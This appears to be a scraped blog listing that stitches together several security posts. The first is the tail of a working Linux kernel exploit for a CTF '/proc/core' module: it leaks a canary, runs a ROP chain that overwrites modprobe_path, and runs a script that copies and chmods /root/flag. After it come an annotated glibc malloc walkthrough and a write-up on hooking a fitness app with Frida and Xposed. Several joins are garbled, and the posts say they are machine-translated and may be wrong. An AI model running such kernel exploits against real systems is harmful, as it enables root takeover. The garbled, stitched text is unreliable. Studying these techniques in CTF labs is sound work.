"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getFlag() {
puts("\033[33m\033[01m[+] Ready to get flag!!!\033[0m");
system("echo '#!/bin/sh\ncp /root/flag /tmp/flag\nchmod 777 /tmp/flag' > /tmp/x");
system("chmod +x /tmp/x");
system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/nova");
system("chmod +x /tmp/nova");

puts("\033[33m\033[01m[+] Run /tmp/nova\033[0m");
system("/tmp/nova");

system("cat /tmp/flag");
exit(0);
}

int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {

if (!swapgs_restore_regs_and_return_to_usermode && strcmp(name, "swapgs_restore_regs_and_return_to_usermode") == 0) {
swapgs_restore_regs_and_return_to_usermode = addr;
printf("\033[33m\033[1m[√] Found swapgs_restore_regs_and_return_to_usermode: %lx\033[0m\n", swapgs_restore_regs_and_return_to_usermode);
break;
}

}

offset = swapgs_restore_regs_and_return_to_usermode - 0xa008da - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] base: 0x%lx\033[0m\n", swapgs_restore_regs_and_return_to_usermode-0xa008da);
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RBX_RET + offset;
rop[i++] = MODPROBE_PATH + offset;
rop[i++] = POP_RAX_RET + offset;
rop[i++] = *(size_t *) "/tmp/x";
rop[i++] = MOV_PTR_RBX_RAX_POP_RBX_RET + offset;
rop[i++] = *(size_t *) "muElnova";
rop[i++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + offset;
rop[i++] = *(size_t *) "muElnova";
rop[i++] = *(size_t *) "muElnova";
rop[i++] = (size_t) getFlag;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

References

https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/

Kernel Pwn ROP bypass KPTI - Wings' Blog (wingszeng.top)

info

This Content is generated by ChatGPT and might be wrong / incomplete, refer to Chinese version if you find something wrong.

「Kernel」Following the Linux Kernel Lab Lightly

· 73 min read
Muel - Nova
Anime Would PWN This WORLD into 2D

Before We Begin

In this article, we will follow along with Linux Kernel Teaching, progressing from basic to advanced kernel studies, to prepare for potential future kernel development work.

It's worth noting that this course also has a Chinese version, and you can support their efforts by starring the repository at linux-kernel-labs-zh/docs-linux-kernel-labs-zh-cn.

In subsequent blog posts, I may simply summarize the course content, as copying existing material without adding my own insights would be pointless. Our focus will be on the experimental sections.

Malloc的深入分析与可利用点分析

· 14 min read

Consistenting fastbin before moving to smallbin. It may seem excessive to clear all fastbins before checking for available space, but it helps avoid fragmentation problems usually associated with fastbins. Additionally, in reality, programs often make consecutive small or large requests, rather than a mix of both. Thus, consolidation is not frequently needed in most programs. Programs that require frequent consolidation usually tend to fragment.

Next chunk of code will be fetching largebin.### Fragment Consolidation

    malloc_consolidate (av);

malloc_consolidate()

Defined in malloc.c at #4704

/*
------------------------- malloc_consolidate -------------------------

malloc_consolidate is a specialized version of free() that tears
down chunks held in fastbins. Free itself cannot be used for this
purpose since, among other things, it might place chunks back onto
fastbins. So, instead, we need to use a minor variant of the same
code.
*/

static void malloc_consolidate(mstate av)
{
mfastbinptr* fb; /* current fastbin being consolidated */
mfastbinptr* maxfb; /* last fastbin (for loop control) */
mchunkptr p; /* current chunk being consolidated */
mchunkptr nextp; /* next chunk to consolidate */
mchunkptr unsorted_bin; /* bin header */
mchunkptr first_unsorted; /* chunk to link to */

/* These have same use as in free() */
mchunkptr nextchunk;
INTERNAL_SIZE_T size;
INTERNAL_SIZE_T nextsize;
INTERNAL_SIZE_T prevsize;
int nextinuse;

atomic_store_relaxed (&av->have_fastchunks, false);

unsorted_bin = unsorted_chunks(av);

/*
Remove each chunk from fast bin and consolidate it, placing it
then in unsorted bin. Among other reasons for doing this,
placing in unsorted bin avoids needing to calculate actual bins
until malloc is sure that chunks aren't immediately going to be
reused anyway.
*/
/* Loop starting from the first chunk, consolidate all chunks */
maxfb = &fastbin (av, NFASTBINS - 1);
fb = &fastbin (av, 0);
do {
p = atomic_exchange_acq (fb, NULL);
if (p != 0) {
do {
{
if (__glibc_unlikely (misaligned_chunk (p))) // Pointers must be aligned
malloc_printerr ("malloc_consolidate(): "
"unaligned fastbin chunk detected");

unsigned int idx = fastbin_index (chunksize (p));
if ((&fastbin (av, idx)) != fb) // Fastbin chunk check
malloc_printerr ("malloc_consolidate(): invalid chunk size");
}

check_inuse_chunk(av, p);
nextp = REVEAL_PTR (p->fd);

/* Slightly streamlined version of consolidation code in free() */
size = chunksize (p);
nextchunk = chunk_at_offset(p, size);
nextsize = chunksize(nextchunk);

if (!prev_inuse(p)) {
prevsize = prev_size (p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
/* Check if prevsize and size are equal */
if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size in fastbins");
unlink_chunk (av, p); // Unlink the prev chunk
}

if (nextchunk != av->top) {
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

if (!nextinuse) {
size += nextsize;
unlink_chunk (av, nextchunk);
} else
clear_inuse_bit_at_offset(nextchunk, 0);

/* Insert p at the head of a linked list */
first_unsorted = unsorted_bin->fd;
unsorted_bin->fd = p;
first_unsorted->bk = p;

if (!in_smallbin_range (size)) {
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}

set_head(p, size | PREV_INUSE);
p->bk = unsorted_bin;
p->fd = first_unsorted;
set_foot(p, size);
}
// next chunk = av -> top, consolidate to topchunk
else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
}

} while ( (p = nextp) != 0);

}
} while (fb++ != maxfb);
}

Firstly, set the PREV_INUSE of the next adjacent chunk to 1. If the previous adjacent chunk is free, merge it. Then check if the next chunk is free and merge if needed. Regardless of whether the merge is complete or not, place the fastbin or the bin after consolidation into the unsorted_bin. (If adjacent to the top chunk, merge it with the top chunk)

Iteration

So long that my head is spinning...

/*
Process recently freed or remaindered chunks, taking one only if
it is exact fit, or, if this a small request, the chunk is remainder from
the most recent non-exact fit. Place other traversed chunks in
bins. Note that this step is the only place in any routine where
chunks are placed in bins.

The outer loop here is needed because we might not realize until
near the end of malloc that we should have consolidated, so must
do so and retry. This happens at most once, and only when we would
otherwise need to expand memory to service a "small" request.
*/

#if USE_TCACHE
INTERNAL_SIZE_T tcache_nb = 0;
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
tcache_nb = nb;
int return_cached = 0; // Flag indicating that the appropriately sized chunk has been put into tcache

tcache_unsorted_count = 0; // Number of processed unsorted chunks

Loop through and place unsorted_bin into the corresponding bin

  for (;; )
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) // Have all unsorted chunks been retrieved
{
bck = victim->bk;
size = chunksize (victim);
mchunkptr next = chunk_at_offset (victim, size);
// Some safety checks
if (__glibc_unlikely (size <= CHUNK_HDR_SZ)
|| __glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): invalid size (unsorted)");
if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ)
|| __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
malloc_printerr ("malloc(): invalid next size (unsorted)");
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely (bck->fd != victim)
|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
malloc_printerr ("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely (prev_inuse (next)))
malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/


if (in_smallbin_range (nb) && // Within the small bin range
bck == unsorted_chunks (av) && // Only one chunk in unsorted_bin
victim == av->last_remainder && // Is the last remainder
(unsigned long) (size) > (unsigned long) (nb + MINSIZE)) // If size is greater than nb + MINSIZE, i.e., chunk can still be a chunk after `nb` memory is taken
{
/* split and reattach remainder */
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb); // Remaining remainder
unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder; // Reconstruct unsorted_bin linked list
av->last_remainder = remainder;
remainder->bk = remainder->fd = unsorted_chunks (av);
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}

set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0)); // Flag for nb
set_head (remainder, remainder_size | PREV_INUSE); // Flag for remainder
set_foot (remainder, remainder_size);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p; // Return nb
}

// More checks...
/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): corrupted unsorted chunks 3");

// Retrieve the head chunk
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

/* Take now instead of binning if exact fit */

if (size == nb)
{
// Set the flag
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
// Put victim into tcache instead of returning
// Since in most cases, a size that has just been needed has a higher probability of continuance, it is put into tcache
tcache_put (victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
#if USE_TCACHE
}
#endif
}

/* place chunk in bin */

if (in_smallbin_range (size)) // Place into small bin
{
victim_index = smallbin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
}
else
{
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
if (fwd != bck) // If large bin is not empty
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE; // Set PREV_INUSE to 1
/* if smaller than smallest, bypass loop below */
assert (chunk_main_arena (bck->bk));
/* Insert directly at the end of the large bin */
if ((unsigned long) (size)
< (unsigned long) chunksize_nomask (bck->bk))
{
fwd = bck;
bck = bck->bk;

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
assert (chunk_main_arena (fwd));
/* Find the first chunk that is not greater than `victim` */
while ((unsigned long) size < chunksize_nomask (fwd))
{
fwd = fwd->fd_nextsize;
assert (chunk_main_arena (fwd));
}

if ((unsigned long) size
== (unsigned long) chunksize_nomask (fwd))
/* If the size is the same, insert it after `fwd`, without adding nextsize to reduce computation */
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
/* Insert it before `fwd`, adding nextsize */
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
}
}
else // If large bin is empty
victim->fd_nextsize = victim->bk_nextsize = victim;
}

// Insert into the linked list
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
// If tcache is full, get chunk from tcache
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif

#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}

#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
// After the while loop, get chunk from tcache
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif

If no chunks of the right size are found during the sorted chunk process, then find an appropriate chunk in the subsequent code

       /*
If a large request, scan through the chunks of current bin in
sorted order to find smallest that fits. Use the skip list for this.
*/

if (!in_smallbin_range (nb))
{
bin = bin_at (av, idx);

/* skip scan if empty or largest chunk is too small */
// If large bin is non-empty and the size of the first chunk >= nb
if ((victim = first (bin)) != bin
&& (unsigned long) chunksize_nomask (victim)
>= (unsigned long) (nb))
{
// Find the first chunk with size >= nb
victim = victim->bk_nextsize;
while (((unsigned long) (size = chunksize (victim)) <
(unsigned long) (nb)))
victim = victim->bk_nextsize;

/* Avoid removing the first entry for a size so that the skip
list does not have to be rerouted. */
// If `victim` is not the last one and `victim->fd` has the same size as `victim`, return next one since it is not mainained by nextsize
if (victim != last (bin)
&& chunksize_nomask (victim)
== chunksize_nomask (victim->fd))
victim = victim->fd;

remainder_size = size - nb;
unlink_chunk (av, victim); // Retrieve victim

/* Exhaust */
// If remaining is less than the minimum chunk, discard it
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
}
/* Split */
// Otherwise, split it into the unsorted_bin
else
{
remainder = chunk_at_offset (victim, nb);
/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks (av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
malloc_printerr ("malloc(): corrupted unsorted chunks");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);
}
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}

/*
Search for a chunk by scanning bins, starting with next largest
bin. This search is strictly by best-fit; i.e., the smallest
(with ties going to approximately the least recently used) chunk
that fits is selected.

The bitmap avoids needing to check that most blocks are nonempty.
The particular case of skipping all bins during warm-up phases
when no chunks have been returned yet is faster than it might look.
*/
/* This part is a bit confusing */思察。t is set to 1, others are set to 0

```c
for (;; )
{
/* Skip rest of block if there are no more set bits in this block. */
/* If bit > map, it means that the free chunks in this block's bin are all smaller than the required chunk. Skip the loop directly. */
if (bit > map || bit == 0)
{
do
{
// If there are no available blocks, then use the top chunk directly
if (++block >= BINMAPSIZE) /* out of bins */
goto use_top;
}
while ((map = av->binmap[block]) == 0); // This block has no free chunks

// Find the first bin of the current block
bin = bin_at(av, (block << BINMAPSHIFT));
bit = 1;
}

/* Advance to bin with set bit. There must be one. */
// When the current bin is not available, search for the next bin
while ((bit & map) == 0)
{
bin = next_bin(bin);
bit <<= 1; // Use the next chunk
assert(bit != 0);
}

/* Inspect the bin. It is likely to be non-empty */
// Start from the smallest chunk
victim = last(bin);

/* If a false alarm (empty bin), clear the bit. */
// If the bin is empty, update the value of binmap and find the next bin
if (victim == bin)
{
av->binmap[block] = map &= ~bit; /* Write through */
bin = next_bin(bin);
bit <<= 1;
}

else
{
// If not empty, extract the chunk and perform splitting and merging
size = chunksize(victim);

/* We know the first chunk in this bin is big enough to use. */
// The first chunk (the largest one) is large enough
assert((unsigned long)(size) >= (unsigned long)(nb));

remainder_size = size - nb;

/* Unlink */
unlink_chunk(av, victim);

/* Exhaust */
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
}

/* Split */
else
{
remainder = chunk_at_offset(victim, nb);

/* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
malloc_printerr("malloc(): corrupted unsorted chunks 2");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
if (in_smallbin_range(nb))
av->last_remainder = remainder;
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}
use_top:
/*
If large enough, split off the chunk bordering the end of memory
(held in av->top). Note that this is in accord with the best-fit
search rule. In effect, av->top is treated as larger (and thus
less well fitting) than any other available chunk since it can
be extended to be as large as necessary (up to system
limitations).

We require that av->top always exists (i.e., has size >=
MINSIZE) after initialization, so if it would otherwise be
exhausted by the current request, it is replenished. (The main
reason for ensuring it exists is that we may need MINSIZE space
to put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize(victim);

if (__glibc_unlikely(size > av->system_mem))
malloc_printerr("malloc(): corrupted top size");
// If the top chunk can be independent after splitting nb
if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
av->top = remainder;
set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);

check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

/* When we are using atomic ops to free fast chunks we can get
here for all block sizes. */
// If it is not enough to split and there are still fastbins, merge the fastbins
else if (atomic_load_relaxed(&av->have_fastchunks))
{
malloc_consolidate(av);
/* Restore the original bin index */
if (in_smallbin_range(nb))
idx = smallbin_index(nb);
else
idx = largebin_index(nb);
}

/*
Otherwise, relay to handle system-dependent cases
*/
// Otherwise, call sysmalloc to request memory from the operating system
else
{
void *p = sysmalloc(nb, av);
if (p != NULL)
alloc_perturb(p, bytes);
return p;
}
}
info

This Content is generated by ChatGPT and might be wrong / incomplete, refer to Chinese version if you find something wrong.

MiBand-8-Pro-Data-to-Obsidian

· 10 min read

Recently, I set up a life management system with the help of DIYGOD. With various plugins, I achieved semi-automation. However, manually recording sleep time, steps, and other data like heart rate and blood pressure is not very geeky. After some research, I found out that Zepp (formerly Huami) has a reverse-engineered API interface that stores step count and other information in plaintext. This led me to impulsively purchase the Xiaomi Mi Band 8 Pro Genshin Impact Limited Edition. To my surprise, I discovered that the Xiaomi Mi Band 8 no longer supports Zepp. Although the Xiaomi Mi Band 7 does not officially support Zepp, it can still be used by modifying the QR code and using the Zepp installation package. However, the Xiaomi Mi Band 8 has completely deprecated Zepp.

Initial Exploration — Packet Capture

Firstly, I attempted to capture packets to see if there was any useful information available. I used to use Proxifier for packet capture, but it was not very effective due to some software having SSLPinning. This time, I utilized mitmproxy along with a system-level certificate.

Tools Used

Testing Method

In a nutshell, I installed mitmproxy on my PC, obtained the mitmproxy-ca-cert.cer file in the $HOME/.mitmproxy directory, and installed it on the Android device as per the normal workflow.

I then installed ConscryptTrustUserCerts in Magisk, restarted the device, which mounted the user-level certificate to the system-level certificate directory during boot. This completed the preparation.

After opening mitmweb on the PC, setting the Wi-Fi proxy on the phone to <my-pc-ip>:8080, I successfully captured HTTPS requests.

Conclusion

It was not very useful. All requests were encrypted, and there were signatures, hashes, nonces, etc., to ensure security. I did not want to reverse engineer the apk, so I abandoned this approach.

Glimpse of Hope — BLE Connection

Since packet capturing was not feasible, I decided to create a BLE client to connect to the smart band and retrieve data, which seemed like a very reasonable approach. Moreover, this method did not require any actions on my phone; a script running on Obsidian, with one connection and data retrieval, seemed to be very automated.

Implementation

The code mainly referenced wuhan005/mebeats: 💓 Real-time heart rate data collection for Xiaomi Mi Bands. However, as his tools were for MacOS, I made some modifications with the help of GPT.

// Java code block translated to English
public final void bindDeviceToServer(lg1 lg1Var) {

Logger.i(getTAG(), "bindDeviceToServer start");

HuaMiInternalApiCaller huaMiDevice = HuaMiDeviceTool.Companion.getInstance().getHuaMiDevice(this.mac);

if (huaMiDevice == null) {

String tag = getTAG();

Logger.i(tag + "bindDeviceToServer huaMiDevice == null", new Object[0]);

if (lg1Var != null) {

lg1Var.onConnectFailure(4);

}

} else if (needCheckLockRegion() && isParallel(huaMiDevice)) {

unbindHuaMiDevice(huaMiDevice, lg1Var);

} else {

DeviceInfoExt deviceInfo = huaMiDevice.getDeviceInfo();

if (deviceInfo == null) {

String tag2 = getTAG();

Logger.i(tag2 + "bindDeviceToServer deviceInfo == null", new Object[0]);

return;

}

String sn = deviceInfo.getSn();

setMDid("huami." + sn);

setSn(deviceInfo.getSn());

BindRequestData create = BindRequestData.Companion.create(deviceInfo.getSn(), this.mac, deviceInfo.getDeviceId(), deviceInfo.getDeviceType(), deviceInfo.getDeviceSource(), deviceInfo.getAuthKey(), deviceInfo.getFirmwareVersion(), deviceInfo.getSoftwareVersion(), deviceInfo.getSystemVersion(), deviceInfo.getSystemModel(), deviceInfo.getHardwareVersion());

String tag3 = getTAG();

Logger.d(tag3 + create, new Object[0]);

getMHuaMiRequest().bindDevice(create, new HuaMiDeviceBinder$bindDeviceToServer$1(this, lg1Var), new HuaMiDeviceBinder$bindDeviceToServer$2(lg1Var, this));

}

}

By examining this function, we can see that the data is retrieved from deviceInfo, which is obtained from huaMiDevice. For those interested, the details of how this is derived can be explored in the package com.xiaomi.wearable.wear.connection.

The Ultimate Solution — Frida Hook

At this point, I had already decided on the final approach - reverse engineering. Since the data sent out is encrypted, there must be a process where unencrypted data handling occurs. By reverse engineering it, hooking into it, and writing an Xposed module to monitor it, the task could be accomplished.

Due to time constraints, I will not delve into how to install Frida.

Initially, I used jadx-gui with the feature copy as frida snippets, which saved a lot of effort. However, due to various peculiarities of Kotlin data classes, many times the necessary information cannot be obtained. As I did not document my journey while troubleshooting, here is a brief overview:

  1. Initially, I observed the fitness_summary database in the /data/data/com.mi.health/databases folder, which contains the desired data. Cross-referencing led me to the com.xiaomi.fit.fitness.persist.db.internal class.
  2. Exploring methods such as update and insert, I found com.xiaomi.fit.fitness.persist.db.internal.h.getDailyRecord method which had output every time a refresh occurred, but only contained values such as sid, time, and did not include the value.
  3. Continuing the trail, I used the given code snippet to inspect overloads and parameter types.
var insertMethodOverloads = hClass.updateAll.overloads;

for (var i = 0; i < insertMethodOverloads.length; i++) {
var overload = insertMethodOverloads[i];
console.log("Overload #" + i + " has " + overload.argumentTypes.length + " arguments.");
for (var j = 0; j < overload.argumentTypes.length; j++) {
console.log(" - Argument " + j + ": " + overload.argumentTypes[j].className);
}
}
  1. It struck me that exceptions could be utilized to examine the function call stack - a breakthrough moment.
var callerMethodName = Java.use("android.util.Log").getStackTraceString(Java.use("java.lang.Exception").$new());
console.log("getTheOneDailyRecord called by: " + callerMethodName);
  1. Proceeding layer by layer, I discovered the class com.xiaomi.fit.fitness.export.data.aggregation.DailyBasicReport, which perfectly met my needs.
    dbutilsClass.getAllDailyRecord.overload('com.xiaomi.fit.fitness.export.data.annotation.HomeDataType', 'java.lang.String', 'long', 'long', 'int').implementation = function (homeDataType, str, j, j2, i) {
console.log("getAllDailyRecord called with args: " + homeDataType + ", " + str + ", " + j + ", " + j2 + ", " + i);
var result = this.getAllDailyRecord(homeDataType, str, j, j2, i);
var entrySet = result.entrySet();
var iterator = entrySet.iterator();
while (iterator.hasNext()) {
var entry = iterator.next();
console.log("entry: " + entry);
}
var callerMethodName = Java.use("android.util.Log").getStackTraceString(Java.use("java.lang.Exception").$new());
console.log("getTheOneDailyRecord called by: " + callerMethodName);
return result;
}

// Output: DailyStepReport(time=1706745600, time = 2024-02-01 08:00:00, tag='days', steps=110, distance=66, calories=3, minStartTime=1706809500, maxEndTime=1706809560, avgStep=110, avgDis=66, active=[], stepRecords=[StepRecord{time = 2024-02-02 01:30:00, steps = 110, distance = 66, calories = 3}])
  1. Faced a challenge as steps is a private attribute, and none of the interfaces like getSteps(), getSourceData() worked, all displaying not a function. Likely a difference in Kotlin and Java handling. Resorted to using reflection for resolution.

The final frida script was formulated to fetch the daily steps data. Altering HomeDataType would yield other data.

var CommonSummaryUpdaterCompanion = Java.use("com.xiaomi.fitness.aggregation.health.updater.CommonSummaryUpdater$Companion");
var HomeDataType = Java.use("com.xiaomi.fit.fitness.export.data.annotation.HomeDataType");
var instance = CommonSummaryUpdaterCompanion.$new().getInstance();
console.log("instance: " + instance);

var step = HomeDataType.STEP;
var DailyStepReport = Java.use("com.xiaomi.fit.fitness.export.data.aggregation.DailyStepReport");

var result = instance.getReportList(step.value, 1706745600, 1706832000);
var report = result.get(0);
console.log("report: " + report + report.getClass());


var stepsField = DailyStepReport.class.getDeclaredField("steps");
stepsField.setAccessible(true);
var steps = stepsField.get(report);
console.log("Steps: " + steps);
// Output: Steps: 110

Final – Xposed Module

The approach now is to listen to a specific address using XPosed, and then to slightly protect against plaintext transmission pigeonholed here. Since the app is always active, I believe this method is feasible. The current challenge is my lack of knowledge in writing Kotlin, let alone Xposed.

Fortunately, the Kotlin compiler's suggestions are powerful enough, and besides configuring Xposed, no additional knowledge is required. Coupled with the powerful GPT, I spent an hour or two figuring out the initial environment setup (hard to assess gradle, it's slow without a proxy, and with a proxy, it becomes unresponsive).```kotlin if (record != null) { SerializableStepRecord( time = XposedHelpers.getLongField(record, "time"), steps = XposedHelpers.getIntField(record, "steps"), distance = XposedHelpers.getIntField(record, "distance"), calories = XposedHelpers.getIntField(record, "calories") ) } else null }

    val activeStageList = activeStageListObject.mapNotNull { activeStageItem ->
if (activeStageItem != null) {
SerializableActiveStageItem(
calories = XposedHelpers.getIntField(activeStageItem, "calories"),
distance = XposedHelpers.getIntField(activeStageItem, "distance"),
endTime = XposedHelpers.getLongField(activeStageItem, "endTime"),
riseHeight = XposedHelpers.getObjectField(activeStageItem, "riseHeight") as? Float,
startTime = XposedHelpers.getLongField(activeStageItem, "startTime"),
steps = XposedHelpers.getObjectField(activeStageItem, "steps") as? Int,
type = XposedHelpers.getIntField(activeStageItem, "type")
)
} else null
}

return SerializableDailyStepReport(
time = XposedHelpers.getLongField(xposedReport, "time"),
tag = XposedHelpers.getObjectField(xposedReport, "tag") as String,
steps = XposedHelpers.getIntField(xposedReport, "steps"),
distance = XposedHelpers.getIntField(xposedReport, "distance"),
calories = XposedHelpers.getIntField(xposedReport, "calories"),
minStartTime = XposedHelpers.getObjectField(xposedReport, "minStartTime") as Long?,
maxEndTime = XposedHelpers.getObjectField(xposedReport, "maxEndTime") as Long?,
avgStep = XposedHelpers.callMethod(xposedReport, "getAvgStepsPerDay") as Int,
avgDis = XposedHelpers.callMethod(xposedReport, "getAvgDistancePerDay") as Int,
stepRecords = stepRecords,
activeStageList = activeStageList
)
}

}


The code above shows a function that processes data retrieved from some records and returns a `SerializableDailyStepReport` object. It extracts and maps various attributes from the records, such as time, steps, distance, and calories, into corresponding fields of the `SerializableStepRecord` and `SerializableActiveStageItem` objects. Finally, it constructs a `SerializableDailyStepReport` object with the processed data.

```kotlin
// build.gradle.kts [Module]
plugins {
...
kotlin("plugin.serialization") version "1.9.21"
}

dependencies {
...
implementation("org.jetbrains.kotlinx:kotlinx-serialization-json:1.6.2")
}

The first code snippet contains the configuration in the build.gradle.kts file for enabling the Kotlin serialization plugin. It also includes the dependency for kotlinx-serialization-json library for JSON serialization.

return Json.encodeToJsonElement(SerializableDailyStepReport.serializer(), convertToSerializableReport(today))

In the above statement, it uses Json.encodeToJsonElement to convert a SerializableDailyStepReport object to a JSON element using its serializer.

Broadcasting

The discussion in this section delves into the challenges faced while considering broadcasting data for an Android application. The initial idea was to use a BroadcastReceiver but was dropped due to complexities related to sending messages between the Android device and a computer.

This led to exploring alternatives like HTTP RESTful APIs, which were implemented using Ktor. However, the fluctuating data retrieval schedule and the need for continuous server upkeep introduced concerns regarding power consumption.

Subsequently, the notion of using sockets was explored to establish communication. A ServerSocket is created to listen for incoming connections, and a ClientHandler is spawned to handle each client's requests. This approach provides a more direct and energy-efficient means of communication compared to HTTP servers.

class MySocketServer(
private val port: Int,
private val lpparam: LoadPackageParam,
private val instance: Any
) {
fun startServerInBackground() {
Thread {
try {
val serverSocket = ServerSocket(port)
Log.d("MiBand", "Server started on port: ${serverSocket.localPort}")
while (!Thread.currentThread().isInterrupted) {
val clientSocket = serverSocket.accept()
val clientHandler = ClientHandler(clientSocket)
Thread(clientHandler).start()
}
} catch (e: Exception) {
Log.e("MiBand", "Server Error: ${e.message}")
}
}.start()
}

